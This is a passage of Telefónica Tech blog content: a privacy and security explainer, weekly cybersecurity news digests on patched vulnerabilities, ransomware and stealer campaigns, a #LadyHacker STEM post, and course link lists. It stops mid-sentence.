Telefónica Tech

In the digital realm, privacy and security are often used interchangeably. However, although both terms are related and equally important, each refers to a different aspect of protecting personal or sensitive information. Privacy shields you from unwanted prying eyes, while security safeguards you against unauthorized access. Maintaining your personal information as both private and secure is key to protecting your online reputation. Understanding the distinctions between privacy and security is essential to safeguarding your information, whether it's personal data or not, as well as your online reputation. Privacy and Security: What They Are and How They Differ What Is Privacy? Privacy revolves around personal information control and management. It encompasses the right to decide what aspects of your life and identity are shared —what, how, and with whom— and what you choose to keep hidden from the public or specific individuals. This control over your information includes keeping personal data, images, photographs, online activity, or messages and communications private to reduce the risks of exposure and its negative consequences. Privacy is pivotal to reputation management. Key features of online privacy include: Data privacy: Protecting sensitive personal information, such as banking data, medical reports, or personal communications, from unauthorized or malicious access. Privacy protection: Employing measures to safeguard online navigation and activity, ensuring that the digital life you wish to keep private remains so. Privacy settings: Understanding privacy settings on social media profiles, email accounts, and other digital platforms limits the amount of personal information visible to the public, including friends and contacts. What Is Security? Security refers to the measures taken to protect information, digital assets, and systems or devices from potential threats. These threats include cyberattacks, malicious software, and data breaches. It is a broader concept than privacy and includes proactive measures to protect data, both common and personal, and sensitive. Therefore, security is fundamental to protecting privacy —without privacy, there is no security— and both are necessary to safeguard one's reputation. ✅ Example: Unauthorized access to someone's mobile photos or messages, publicly disclosed with their date of birth serving as the PIN, can damage their reputation. Some key components of security include: Implementing robust cybersecurity measures to defend against cyber threats. Ensuring safe internet usage through protocols and security tools. Protecting the network and data from unauthorized access and security breaches. Safeguarding data through encryption and secure storage. Staying informed about the latest threats and security measures. Applying effective security practices, including secure browsing and two-factor authentication (2FA), also on social media. To protect privacy and security, consider these recommendations: Use strong passwords and two-factor authentication (2FA) or tools like Google KeyPass. Understand the privacy settings of accounts on services and social networks and learn privacy configurations. Review and update app and website permissions. Exercise caution when sharing personal information. Learn about phishing and cyber scam risks. Regularly update software on your computer, mobile devices, and security tools like antivirus programs. Limit data sharing, even with acquaintances or trusted apps and websites. Use VPN and encrypted messaging apps. Cyber Security Cyber Security is an essential skill in today's digital era, and Cisco offers a free course in it July 17, 2023 How to Protect and Manage Your Online Reputation Online reputation is how others perceive you on the internet, and it largely defines your digital identity. Moreover, in today's world, it also has real-world implications, impacting how you are perceived personally, socially, or professionally. ✅ Examples: A company may consider social media content when making hiring decisions during a selection process. A reputation crisis on the internet, caused by a social media post, can affect a company's financial activity and results. Privacy and security are two fundamental concepts for safeguarding your data and online reputation. Manage reputation encompasses monitoring opinions about products, services, or publications, as well as overseeing your presence and reputation on the internet and social media. It is an ongoing process that requires time and effort to control your digital footprint—the trail of activity and data left behind when using the internet. Here are some tactics to protect your online reputation: Before posting anything online, including on social media, always consider how it might be perceived by others and how it will affect your reputation. Periodically search for yourself to stay informed about what is said about you online. In addition, monitor your profiles on social media to detect any inappropriate or negative content. If you find something inappropriate, take steps to remove it or request its removal from the respective platform. Be respectful of others, even when interacting with bots. When engaging online, whether through blog comments, forums, or social media, ensure your communication is respectful and constructive. Avoid personal attacks and heated arguments. Remember that everything said online can be tracked and affect your reputation. Further protect your personal information by avoiding sharing sensitive information such as your address, phone number, and the companies or banks you are a customer of. Use strong passwords and do not share them, even with acquaintances. Additionally, exercise caution with phishing or malware-laden emails that attempt to obtain personal information. Always verify the authenticity of websites and sources before providing confidential information. Image: Freepik. Cyber Security AI of Things Things you shouldn't share with ChatGPT July 4, 2023

Microsoft patches multiple vulnerabilities including two 0-days Microsoft released a security update detailing a total of fifty-nine vulnerabilities to be patched, including five critical severity and two actively exploited 0-days. Of the two 0-days, CVE-2023-36802 (CVSS 7.8) affects Microsoft Streaming Service and would allow an attacker to perform privilege escalation, while CVE-2023-36761 (CVSS 6.2) affects Microsoft Word and can be exploited by an attacker to steal NTLM hashes when opening a document. On the other hand, the critical vulnerabilities included in the update affect .NET and Visual Studio (CVE-2023-36796, CVE-2023-36792, CVE-2023-36793), Azure Kubernetes Service (CVE-2023-29332) and Windows Internet Connection Sharing (CVE-2023-38148). In addition to the fifty-nine vulnerabilities already mentioned, the update includes five other Microsoft Edge (Chromium) flaws and two flaws from Electron and Autodesk. More info SAP patches two critical vulnerabilities at September Security Patch Day SAP announced the release of thirteen new security patches at its September Security Patch Day, three of which are updates to previously released patches. The most severe vulnerability patched in this release is CVE-2023-40622 (CVSS 9.9), which allows attackers to access BusinessObjects information and in turn allows future attacks to compromise the entire application. SAP also says it has patched another critical vulnerability, CVE-2023-40309 (CVSS 9.8), which affects CommonCryptoLib and is an authorisation check flaw and can result in privilege escalation. The patches that address CVE-2023-40309 also address another vulnerability mentioned in this Security Patch Day, namely CVE-2023-40308 (CVSS 7.5), a memory corruption bug in CommonCryptoLib. Finally, most of the other security notes patch vulnerabilities of medium or low severity. More info Public exploit for the RCE ThemeBleed flaw in Windows 11 Researcher Gabe Kirkpatrick published a PoC for a Windows vulnerability discovered in a bug bounty. The flaw, identified as CVE-2023-38146, with CVSS 8.8, is a vulnerability that allows remote code execution, which can be exploited if the user opens a malicious .THEME file, created by the attacker. The researcher detected the flaw by looking for strange Windows file formats, when he discovered that when using a version number 999, the routine to control the .MSSTYLES file has a discrepancy between the time when the signature of a DLL is verified and the time when the library is loaded. An attacker, with a specially crafted .MSSTYLES, can replace a verified DLL with a malicious one and execute arbitrary code on the victim system. Kirkpatrick managed to open the Windows Calculator when the user starts a theme file with the PoC. Microsoft has fixed the bug in the Patch Tuesday issued this week, removing the functionality from version 999, although the condition persists. More info 3AM: new ransomware used as an alternative to LockBit Symantec's Threat Hunter Team published an analysis of a new ransomware family, 3AM, which has been used in conjunction with LockBit ransomware in a single attack. As LockBit was blocked by the targeted network, the attackers used 3AM in the incident, successfully infecting three computers. This new ransomware, written in Rust, attempts to stop various services on the infected device before encrypting the files, and once encryption is complete it attempts to delete Volume Shadow Copies (VSS). In their ransom note, the attackers state that they will not leak the data they have obtained, but if the ransom is not paid, they will sell the data on the Dark Web. Symantec points out that 3AM is a completely new ransomware family and that its authors have not been associated with any cybercriminal organisation. Having been used as an alternative to LockBit, it is likely that this new malware will become more popular in the future and therefore start to be used more by other threat actors More info Colombia activates the Cyber Unified Command Post (PMU Ciber) for the attack on IFX Networks Mauricio Lizcano, minister of the Colombian Ministry of Information Technology and Communications, announced on his official Twitter account that the government has activated the Cyber Unified Command Post (PMU Ciber) to try to mitigate the effects of the cyber attack suffered by telecommunications provider IFX Networks. Lizcano also announced that a total of 762 organisations have been affected, located not only in Colombia but also in Argentina and Chile. More info Cyber Security Hypocrisy doublespeak in ransomware gangs July 14, 2022 Imagen de apertura: kjpargeter / Freepik.

DB#JAMMER: malicious campaign against Microsoft SQL servers The Securonix research team has published an investigation into a malicious campaign called DB#JAMMER in which malicious actors are attacking MS SQL servers to distribute ransomware. The group behind these incidents could not be identified, however it has been detailed that the methodology employed by them follows the same pattern, which is to gain initial access through brute force attacks on MS SQL servers. Thereafter, they begin to perform network enumeration and reconnaissance tasks with the aim in the next phase of attacking the system's firewall and establishing persistence by connecting to a remote SMB share to transfer files to and from the victim's system, as well as installing tools such as Cobalt Strike. Finally, this campaign ends with the distribution of the FreeWorld ransomware, which is considered to be a variant of the Mimic ransomware. More info New variant of Agent Tesla malware FortiGuard Labs has discovered a phishing campaign used to spread a new variant of Agent Tesla, a malware family used as Malware-as-a-Service that employs a remote access trojan (RAT) and a data stealer to gain access to devices. This campaign starts with a phishing email that includes an Excel file used, once opened by the user, to exploit the vulnerability CVE-2017-11882/CVE-2018-0802, which allows remote code execution. Agent Tesla is then downloaded and installed, allowing the threat actor to steal sensitive victim information, including credentials, keylogging information and device screenshots. Finally, the malware, which encrypts its most relevant modules to avoid being analysed, transmits the stolen sensitive information via SMTP protocol emails. More info New Apple 0-day vulnerabilities actively exploited Apple has issued a security advisory in which it fixes two new 0-day vulnerabilities that are being actively exploited. One of the security flaws has been registered as CVE-2023-41064, which is a buffer overflow weakness that is triggered when processing maliciously crafted images and can lead to the execution of arbitrary code. The other security flaw is CVE-2023-41061, which is a validation issue that can be exploited by means of a malicious attachment. Researchers at Citizen Lab have published research detailing that these vulnerabilities were exploited via an iMessage zero-click exploit chain called BLASTPASS that was used to deploy NSO Group's Pegasus software via PassKit attachments containing malicious images. Apple recommends its users update their assets to the following versions macOS Ventura 13.5.2, iOS 16.6.1, iPadOS 16.6.1 and watchOS 9.6.2. More info Android patches one actively exploited vulnerability and three critical ones Android has released a new bulletin listing vulnerabilities that were patched in the September security update, including a high-severity vulnerability that appears to be exploited, according to Google. This vulnerability (CVE-2023-35674) would allow a threat actor to perform privilege escalation without the need for user interaction. The bulletin claims to have patched a total of 34 vulnerabilities, including three of critical severity (CVE-2023-35658, CVE-2023-35673, CVE-2023-35681) that would allow an attacker to remotely execute code without requiring additional execution privileges. The security update is targeted at devices running Android versions 11, 12 and 13, so users of these versions are advised to install the update as soon as possible, while if you have a device running Android 10 or lower, it is recommended to upgrade to a device with a newer version. More info Investigation of techniques used in Storm-0558 threat actor attacks Microsoft published an article last July reporting how it mitigated an attack by the threat actor known as Storm 0558, which targeted email accounts of up to 25 different entities across US government agencies, including the State Department, and European institutions. According to recent disclosures, Storm-0558 was able to carry out the attack because it found information about a digital key after compromising a corporate account of a Microsoft engineer in April 2021. Thanks to the exfiltration of that key, the threat actor was able to create its own authentication tokens to access the Outlook email accounts of high-ranking government officials. Based on these facts, Microsoft revoked all valid MSA signing keys to prevent access to other compromised keys and notes that they have not identified any evidence of unauthorised access to customer accounts using the same authentication token forgery technique. More info Image Rawpixel / Freepik.

New variants of Lockbit ransomware Kaspersky researchers have published an article reporting the appearance of new strains of LockBit ransomware. The experts point out that since September 2022, when the Lockbit builder was leaked onto the network, it has allowed anyone to create a customised version of the ransomware. Kaspersky says that, of the total of 396 samples identified, 312 artefacts are associated with variants from the leak. Of these new versions, one incident has been detected in which the ransom note procedure has changed. This note uses the name of a group called National Hazard Agency as the headline, which adds to other groups that use variants called Bl00dy and Buhti, and directly indicates the amount to be paid and directs its communications to a Tox service and an email. This contrasts with the lockBit group, which did not mention the amount and the communication was carried out on its platform. In conclusion, Kaspersky indicates that of the samples analysed, 77 did not carry the Lockbit name in the note. More info Vulnerability in Intel CPU affects Windows systems Microsoft has published an article warning of a new attack exploiting the Downfall vulnerability in Windows devices. The vulnerability, identified as CVE-2022-40982, with CVSS of 6.5, affects several versions of Intel processors and all versions of Windows 10, Windows 11 and Windows Server 2019 and 2022. It is a flaw that, if successfully exploited, would allow an authenticated user to enable information disclosure through local access and could be used to infer data from affected CPUs, such as the user kernel, processes, virtual machines, and trusted execution environments. The vulnerability has been mitigated with the Intel Platform Update 23.3 microcode update. More info Malicious campaign attacking Citrix NetScaler assets The Sophos research team has made a post on its Twitter profile reporting malicious campaign activity exploiting a vulnerability in Citrix NetScaler. The security flaw in particular is CVE-2023-3519, which, according to the experts, a threat actor, probably attributed to FIN8, has been exploiting since August, allowing it to perform payload injections, implement obfuscated PowerShell scripts and place PHP webshells on victims' systems. Sophos also pointed out to BleepingComputer that due to the possible attribution of the FIN8 actor, the campaign's specific aim could be to infect its victims by distributing the BlackCat ransomware. It should also be noted that the CVE-2023-3519 vulnerability has been patched since July, but it is estimated that in August there were still more than 31,000 vulnerable assets exposed. More info High criticality vulnerability patched in Google Chrome Google has patched a high-criticality vulnerability affecting Chrome in the new security update, version 116.0.5845.140 for Mac and Linux, and 116.0.5845.140/.141 for Windows, which will be released in the coming days. The vulnerability, registered as CVE-2023-4572, is a use after free vulnerability affecting MediaStream. An attacker could exploit this bug to manipulate the asset if MediaStream does not remove the pointer to a memory location after freeing it. In addition, Google has reported that updates patching high-impact security vulnerabilities will be released weekly, instead of every four weeks, in order to deploy security fixes faster. With this, the company also intends for the weekly updates to help address the patching gap in Chrome's release cycle. More info Analysis of the new SapphireStealer variants SapphireStealer is a .NET stealer malware focused on stealing credentials from browser databases, whose code was first published on GitHub in December 2022. However, Cisco Talos researchers claim that in early 2023 new versions began to be released, with multiple variants of this malware currently being exploited by various threat actors. While SapphireStealer can steal sensitive information from infected devices, including screenshots, browser credentials and host information, new variants also appear to be focused on enhanced data exfiltration. Finally, it should be noted that this stealer has also been used in conjunction with another malware, FUD-Loader, in multi-stage infections. More info

Google patches multiple high-severity vulnerabilities in Chrome Google has released a security update for Chrome that patches five vulnerabilities reported by researchers outside the company, four of which have been classified as high severity. Of the five vulnerabilities, CVE-2023-4430, a use-after-free bug in Vulkan, has the highest severity, according to the company. Another of the patched vulnerabilities is CVE-2023-4429, also a use-after-free bug in the Loader component. On the other hand, the other three vulnerabilities patched in the new update allow access to out-of-bounds memory and affect CSS (CVE-2023-4428), V8 (CVE-2023-4427) and Fonts (CVE-2023-4431). It should be noted that Google has not mentioned that any of the vulnerabilities have been exploited in attacks. The company recommends upgrading to Google Desktop Stable versions 116.0.5845.110 for macOS and Linux or 116.0.5845.110/.111 for Windows. More info HiatusRAT targets Taiwan and the US Department of Defence The threat actor group behind the HiatusRAT malware has resumed its activity, targeting organisations in Taiwan and a US military procurement system. Lumen researchers identified this new campaign, although its identity and origin remain unknown. The threat actors are using new VPS servers to host samples of the malware, and their targets include commercial enterprises and a Taiwanese government entity, as well as a US Department of Defence server. They have adapted the malware to various architectures, preferring Ruckus devices and directing connections from Taiwan, being used to spy through enterprise routers, creating a C2 proxy network with infected perimeter network devices. Although their objective is uncertain, it is suspected that they are seeking information on military contracts. HiatusRAT, discovered in mid-March 2023, was by then targeting high-level assets to spy on targets in Latin America and Europe. More info FBI seeks to stop Lazarus from withdrawing $40 million in cryptocurrency The FBI has issued a statement asking cryptocurrency companies to cooperate in preventing Lazarus, a North Korean-sponsored APT also known as APT38 or TraderTraitor, from withdrawing approximately 1,580 bitcoins from their wallets through theft. To this end, it has published the addresses of these wallets and asked cryptocurrency companies to analyze the blockchain data associated with these addresses and try to avoid transactions involving them, both directly and indirectly. In the release, the FBI also accuses Lazarus of being responsible for the theft of $60 million from Alphapo, $37 million from CoinsPaid and $100 million from Atomic Wallet. More info Danish Hosting Companies hit by ransomware Hosting companies CloudNordic and AzeroCloud in Denmark suffered ransomware attacks resulting in the loss of customer data and the shutdown of systems, including websites and email. Despite restoration efforts, the data has been unrecoverable and has led to the loss of most customers' information. Both brands, which belong to the Certiqa Holding ApS, refused to pay ransom to the threat actors and are cooperating with cybersecurity experts and law enforcement. According to statements from both companies, the attack achieved this magnitude of damage due to the infection of critical servers during a data center migration, which allowed the attackers to access critical administrative, data storage, and backup systems. It should also be noted that both CloudNordic and AzeroCloud claim that they did not evidence unauthorized access to data, although hundreds of customers lost information stored in the cloud. More info RCE vulnerability in WinRAR Zero Day Initiative researcher "goodbyeselene" has discovered a critical vulnerability in WinRAR, the popular file compression tool for Windows. This vulnerability, known as CVE-2023-40477, has raised concerns due to its potential use by threat actors as it could be exploited by remote attackers to execute arbitrary code on the target system simply by opening a RAR archive. The vulnerability lies in the lack of proper validation of user-supplied data, which could lead to unauthorized access to memory beyond the end of an allocated buffer. RARLAB acted quickly after being notified of the vulnerability and released WinRAR version 6.23, which effectively fixes the vulnerability. More info Image: Rawpixel / Freepik.

Progress knows no gender. #LadyHacker is a global initiative that demonstrates and asserts its globalness. This movement highlights women's essential and necessary role in the technology sector. It also aims to inspire and empower young girls and women to explore their potential in STEM careers: Science, Technology, Engineering, and Mathematics. Diversity fuels innovation, and innovation leads to success. STEM disciplines form the foundation of innovation and progress. From creating algorithms powering Artificial Intelligence to designing technological solutions that tackle global issues, enhance health and well-being, or reduce our environmental footprint, STEM careers drive the transformation of our society. The push for education and careers in STEM not only accelerates economic development but also fosters a fairer, more inclusive, and sustainable society. At Telefónica Tech, women like Carmen, Elena, Jess, Dagmara, María, Karla, and many more #LadyHacker prove every day that gender doesn't define individuals' capabilities in the technical and scientific fields. Keep reading to meet them. Telefónica Tech #LadyHacker Tamires Abujamra is innovating at Telefónica Tech Brazil September 14, 2023 Telefónica Tech Meet #LadyHacker Karla Parra, Cybersecurity expert at Telefónica Tech June 20, 2023 Telefónica Tech Meet #LadyHacker Jess Woods, Cloud expert at Telefónica Tech March 8, 2023 Telefónica Tech «We are moving towards genderless professions», María Martínez August 8, 2022 Telefónica Tech “To be a hacker in life is to be a passionate, talented person who manages to influence the transformation of society", Carmen Alonso July 28, 2022 Image: Freepik.

Microsoft Patch Tuesday August fixes two actively exploited vulnerabilities Microsoft has fixed 74 vulnerabilities in its Patch Tuesday for the month of August, including two 0-day vulnerabilities, which have been actively exploited, and six critical flaws. Specifically, the security flaws that have been exploited have been identified as ADV230003, and refer to a security flaw already known as CVE-2023-36884, CVSSv3 of 8.8, whose exploitation allows remote code execution in Office and Windows HTML. On the other hand, the flaw identified as CVE-2023-38180 which, if exploited, can cause a DDoS attack on .NET and Visual Studio applications. It should be noted that Microsoft has acknowledged that a PoC for the latter vulnerability would be available. Finally, it should be noted that these updates do not include the twelve vulnerabilities in Microsoft Edge (Chromium) that were fixed earlier this month. More info: https://msrc.microsoft.com/update-guide/releaseNote/2023-Aug Downfall: the new vulnerability in Intel microprocessors A Google researcher, Daniel Moghimi, has discovered how to exploit a new vulnerability, tracked as CVE-2022-40982 or Downfall, that affects Intel processors from Intel Skylake to Ice Lake architectures and allows the theft of sensitive information protected by software Guard eXtensions (SGX), Intel's hardware-based memory encryption. Moghimi developed two downfall attack techniques that employ the gather instruction: Gather Data Sampling (GDS) and Gather Value Injection (GVI); both require the attacker to be on the same physical processor as the victim, although a local program or malware could also exploit the vulnerability. While the details of the flaw were kept private for a year in order to find solutions, the hardware redesign that would eliminate the risk of Downfall attacks has not been carried out, although software-based solutions have been proposed by the researcher. More info: https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/gather-data-sampling.html Analysis of the RedHotel threat actor The team of researchers at Recorded Future has published the results of a research study analysing a threat actor attributed to China and named RedHotel. According to the experts, this threat actor is attributed with attacks against 17 countries between 2021 and 2023, although its origin could date back to 2019. RedHotel's targets include academic institutions, aerospace and communication services, although most of them would be governmental organisations. Regarding its objectives, this threat actor stands out for its intelligence gathering, as well as its focus on economic espionage. As for its methodology of action, it is known for exploiting the Log4Shell security flaw, using tools such as Cobalt Strike and Brute Ratel C4 (BRc4) and malware families such as FunnySwitch, ShadowPad, Spyder and Winnti. It also focuses on initial reconnaissance and long-term network access through command and control servers, which are commonly NameCheap-registered domains. More info: https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf Infected PDFs used to distribute updated STRRAT malware Security researchers at Cyble Research and Intelligence Labs (CRIL) have identified that the Java-based RAT called STRRAT, which was capable of keylogging and stealing credentials in browsers and email clients, has evolved dramatically and now has new distribution methods. Now, the updated version incorporates the Crimson ransomware module and deploys a multitude of infection chains. The entry vector used is via a malicious email, which upon opening the attached PDF prompts the download of a ZIP file containing the malicious JavaScript. To maintain persistence, the RAT creates an entry in the task scheduler with the name Skype. In addition to this, STRRAT version 1.6 employs two string obfuscation techniques: Zelix KlassMaster (ZKM) and Allatori, which make it difficult for security researchers to analyze and detect the malware. More info: https://cyble.com/blog/strrats-latest-version-incorporates-dual-obfuscation-layers/ Statc Stealer: new malware masquerading as legitimate Google ads The Zscaler ThreatLabz team has discovered a new sophisticated malware called Statc Stealer, which infects Windows devices by initially masquerading as a legitimate Google ad. This new stealer is capable of exfiltrating sensitive information such as credit cards, credentials and cryptocurrency wallets through the most commonly used browsers on Windows, including Chrome, Edge, Firefox and Opera. In addition, Statc Stealer is programmed in C++, can make use of evasion techniques that avoid detection by thwarting reverse engineering attempts, and makes use of the HTTPS protocol to send encrypted stolen data to its command and control server. Zscaler warns that infection with this stealer in organisations and businesses can pose a number of risks, including financial loss and reputational damage. More info here: https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat

In an increasingly digitized world, safeguarding our data and information has become essential. With the growing reliance on technology, cyberattacks and threats are also on the rise. In this post, we've curated a selection of content exploring Cybersecurity significance and how to tackle current challenges. Through 16 posts, you'll learn about different types of attacks, techniques to prevent them, and tools to detect and respond to security incidents. A security breach can jeopardize a company's reputation, financial results, and business continuity. Discover the best practices to protect your systems and valuable assets, critical to any organization's continuity and strengthening your security strategy against cyber threats. Cyber Security AI of Things Cyber Security Evolution: AI as a Tool for Attack and Defence June 28, 2023 Cyber Security Out of Office: How to communicate your vacation while protecting your privacy and Cyber Security July 6, 2023 Cyber Security AI of Things Artificial Intelligence applied to industrial Cyber Security (OT) April 25, 2023 Cyber Security AI of Things Things you shouldn't share with ChatGPT July 4, 2023 Cyber Security Four cyber security milestones that shaped the future of malware May 22, 2023 Cyber Security How to use Passkey, Google's password substitute May 17, 2023 Cyber Security The importance of access control: is your company protected? May 29, 2023 Cyber Security How language puts business Cybersecurity at risk June 1, 2023 Cyber Security 3 Key Cyber Security Considerations July 3, 2023 Cyber Security Typosquatting: how to detect and protect yourself June 7, 2023 Cyber Security Cybersecurity: “black swan“ events in a connected world March 21, 2023 Cyber Security Cybercrime, a constant threat to all types of companies March 29, 2023 Cyber Security Cryptography, a tool for protecting data shared on the network May 31, 2023 Cyber Security Evolution of Spear-Phishing Techniques of Notorious Threat Groups and malware used April 17, 2023 Cyber Security Artificial Intelligence, ChatGPT, and Cyber Security February 15, 2023 Cyber Security Consequences of a cyber-attack in industrial environments January 17, 2023 Image by rawpixel.com at Freepik.

Cl0p ransomware campaign exploiting vulnerability in MOVEit On 31 May 2023, Progress Software released a patch for a critical SQL injection vulnerability that could allow attackers to gain full control of a MOVEit software installation. Specifically, this security flaw, registered as CVE-2023-34362, CVSSv3 9.8, was considered a 0-day because its exploitation was actively identified prior to its patch. Days later, Microsoft attributed a campaign to exploit this vulnerability to ransomware operators Cl0p. Since then, the number of victims, according to Konbriefing, has increased to 522 organisations across a multitude of sectors globally, including consulting, technology and retail companies, with the US being the most affected country. Based on these facts, Ryan McConechy, CTO of Barrier Networks, told the digital media Spiceworks that the authorities recommend organisations not to negotiate with the attackers. More info: https://www.spiceworks.com/it-security/security-general/articles/moveit-vulnerability-impact-victims/ Critical vulnerability in MikroTik routers Researchers at VulnCheck reported that a critical elevation of privilege flaw in MikroTik RouterOS routers poses a significant risk to more than 900,000 devices. The vulnerability identified as CVE-2023-30799 (CVSS 9.1) allows remote threat actors with existing administrator accounts to gain super-admin level through the device's HTTP or Winbox interface. Although valid credentials are required, the system is not protected against brute-force attacks due to a known default admin user. The vulnerability was originally disclosed in June 2022 as an exploit called FOISted without a CVE identifier. However, it was not fully patched until July 2023 for version 6.49.8. A PoC developed by VulnCheck demonstrated that it is possible to control the RouterOS operating system, gain super-admin access through simple privilege escalation, and hide activities. MikroTik recommends applying the latest update, removing administrative interfaces from the Internet, restricting login IP addresses, disabling Winbox and using only SSH with public/private keys to mitigate the vulnerability. https://vulncheck.com/blog/mikrotik-foisted-revisited 15,000 Citrix servers found vulnerable to RCE attacks Researchers at the non-profit Shadowserver Foundation have warned that a search of open sources reveals that at least 15,000 Citrix servers are currently vulnerable to CVE-2023-3519, CVSSv3 of 9.8, which could be exploited by a threat actor to remotely execute code without authentication. It should be noted that exploiting this vulnerability requires the vulnerable device to be configured as a gateway or virtual authentication server. Shadowserver notes that these Citrix Netscaler ADC and Citrix Gateway devices appear with a last update date prior to the release of the patch, so they are assumed to be vulnerable. On the other hand, CISA warned that a critical infrastructure in the United States was recently attacked by a 0-day exploit of this vulnerability. More info: https://twitter.com/Shadowserver/status/1682355280317919233 Apple releases security update for new 0-day vulnerability Apple has released a new security update for iOS, iPadOS, macOS, tvOS, watchOS and Safari to address a 0-day vulnerability it is aware of that has been exploited in recent attacks against iOS versions prior to iOS 15.7.1. The vulnerability, which is listed as CVE-2023-38606 (not yet assigned CVSS), allows a malicious application to potentially change the state of the kernel. CVE-2023-38606 is the third vulnerability related to Operation Triangulation, a zero-click attack (receiving the message triggers infection without any user interaction) against iOS devices via iMessage. The other two 0-days, CVE-2023-32434 and CVE-2023-32435, have already been patched by Apple. More info: https://support.apple.com/en-us/HT213841 Vulnerability in AMD Zen2 CPUs allows the theft of sensitive data Google security researcher Tavis Ormandy discovered a new vulnerability affecting AMD Zen2 CPUs that could allow a threat actor to steal sensitive data, such as passwords and encryption keys, at a rate of 30 KB/s from each CPU core. The vulnerability has been classified as CVE-2023-20593 and is caused by improper handling of an instruction called 'vzeroupper' during execution, a common performance-enhancing technique used in all modern processors. After triggering an exploit optimized for the vulnerability, a threat actor could leak sensitive data from any system operation, including those taking place in virtual machines, isolated sandboxes, containers, etc. The Google researcher has published a PoC to exploit the vulnerability. More info: https://lock.cmpxchg8b.com/zenbleed.html

Technology is constantly changing and evolving, gaining more importance in our personal and professional lives. As individuals and professionals, this demands staying updated with technical knowledge and skills. Summer break, with more free time, is a great opportunity to learn about Cybersecurity, Artificial Intelligence, and IoT (Internet of Things) technology. Fortunately, there are numerous free online resources and courses that can be completed in just a few hours, even from your mobile. These resources serve various purposes: from satisfying personal curiosity to catching up, reinventing, or adapting to the job market. These resources also help us discover new professional opportunities or explore potential career paths. More than three quarters of companies in the EU say they have difficulties finding workers with the necessary skills. (1) If you're interested in improving your tech skills and finding new career opportunities, this post compiles a selection of contents exploring current possibilities in Cybersecurity, programming, Artificial Intelligence, generative AI, and the Internet of Things (IoT). AI of Things How to start programming in Artificial Intelligence: languages, tools and recommendations January 18, 2023 Cyber Security Cyber Security is an essential skill in today's digital era, and Cisco offers a free course in it July 17, 2023 AI of Things These free Google courses will get you started with generative-AI June 8, 2023 AI of Things Cursos gratuitos online para aprender IoT (Internet de las Cosas) en 2023 3 de agosto de 2023 __ 1. Source: European Year of Skills 2023. Image by lookstudio at Freepik.

Campaign targeting the financial sector in Latin America IBM Security X-Force has detected an email phishing campaign distributing the BlotchyQuasar malware from late April to last May. The malware, developed by a group identified as Hive0129, is coded to collect credentials from multiple banking websites and applications in Latin America. It is a banking Trojan developed on the code base of QuasarRAT, which is under continuous development and has functionalities such as the installation of certificates and automatic proxy configuration URLs that can facilitate the impersonation of financial institutions. It also installs third-party tools such as PuTTY, RDP, Chrome/Opera Portable, AnyDesk and other credential stealers. The campaign consists of sending victims an email impersonating government agency in Latin America, which includes a link to a document and a PDF that starts the infection chain. As for the group, Hive0129, tracked by X-Force since 2019, its origin is believed to be in South America, targeting government and private entities in Colombia, Ecuador, Chile, and Spain. More info NoEscape: new ransomware threatening double extortion and data breaches A new ransomware was recently spotted and is believed to be the successor to Avaddon, which shut down operations in 2021. Known as NoEscape, this new ransomware began operating in June 2023, targeting businesses in double extortion attacks. They threaten to release data to the public unless a ransom is paid, ranging from hundreds of thousands to more than $10 million. NoEscape steals corporate data before encrypting files and deletes processes associated with security software, backup applications, web servers and databases. In addition, it uses Salsa20 encryption and adds a unique 10-character extension to encrypted files. It also modifies the wallpaper and displays ransom notes providing ransom payment instructions on its Tor website. There are currently ten affected victims from different countries and industries on their data breach site, indicating that they do not focus on a specific industry and region. More info BundleBot stealer analysis Researchers at Check Point Research have published a paper analysing a new stealer/bot that abuses the dotnet bundle as a single file. Referred to as BundleBot, it is distinguished by its infection chain, which is more sophisticated, leveraging Facebook ads and compromised accounts to redirect victims to websites that spoof software, AI tools and games. Some of these include Google AI, PDF Reader, Canva or Super Mario 3D World. Once the victim accesses and downloads the illegitimate program, the first stage of infection begins, which consists of a RAR file containing the dotnet package. In the second stage, a password-protected ZIP is downloaded, extracted, and executed by BundleBot, which exploits the dotnet package. As a stealer, its functionalities include the exfiltration of system information via its C2, including computer data such as user name, operating system version, IP, web browser data such as cookies, credentials or credit cards, Facebook account information or screenshots. It should be noted that due to the use of the dotnet package as a single file, multi-stage infection and obfuscation, BundleBot is characterised by the fact that it is difficult to detect. More info Oracle Security Bulletin Oracle has released security patches to fix security flaws affecting more than 130 products used in various industries. A total of 508 new security patches have been addressed in July, 76 of which are considered critical. Among the patched products are Oracle Financial Services Applications, with a total of 147 vulnerabilities, of which 115 could be exploited remotely. In addition, Oracle Communications said that of the 77 security flaws collected, 57 could also be exploited remotely by malicious actors. And Oracle Fusion Middleware with similar figures of 60 security updates of which 40 have been identified as remotely exploitable. It should also be noted that MySQL is also one of the most affected products, with a total of 21 vulnerabilities. Oracle recommends that users update to the latest version to avoid possible exploitation by malicious actors. More info Photo: rawpixel.com / Freepik.

Three new vulnerabilities in MOVEit Transfer fixed Progress Software has released security updates for three vulnerabilities affecting the MOVEit Transfer software. The first one, identified as CVE-2023-36934 and of critical severity, could allow unauthenticated attackers to gain unauthorised access to the MOVEit database and from there execute malware, manipulate files or extract information. Another vulnerability fixed was considered to be of high severity. Identified as CVE-2023-36932 it consists of a SQL injection flaw that can be exploited by logged-in threat actors to gain unauthorised access to the software database. These two SQL injection security issues affect versions 12.1.11, 13.0.9, 13.1.7, 14.0.7, 14.1.8, 15.0.4 and earlier. The third security flaw fixed is CVE-2023-36933, which is a vulnerability that allows threat actors to unexpectedly close the MOVEit Transfer program. It affects versions 13.0.9, 13.1.7, 14.0.7, 14.1.8, and 15.0.4. Progress Software has made the necessary updates available for all versions and strongly recommends users to upgrade to the latest version to reduce the risks posed by these vulnerabilities. In addition, due to recent events, the company announced that it plans to release MOVEit product updates every two months. More info Apple 0-day vulnerability patched Apple has released a new round of Rapid Security Response (RSR) updates to address a new 0-day vulnerability exploited in attacks affecting iPhones, Macs and iPads. The vulnerability has been classified as CVE-2023-37450 and was reported by an anonymous researcher. Apple reports that it is aware that the 0-day vulnerability may have been actively exploited. The vulnerability has been found in the Apple-developed WebKit browser engine, and allows attackers to obtain arbitrary code execution on targeted devices by tricking users into opening web pages with maliciously crafted content. The company has addressed this vulnerability with enhanced checks to mitigate exploitation attempts. Since the beginning of 2023, Apple has patched ten 0-day vulnerabilities affecting iPhones, Macs or iPads. More info Microsoft fixes 132 vulnerabilities, including six 0-day flaws Microsoft released its monthly security update to address a total of 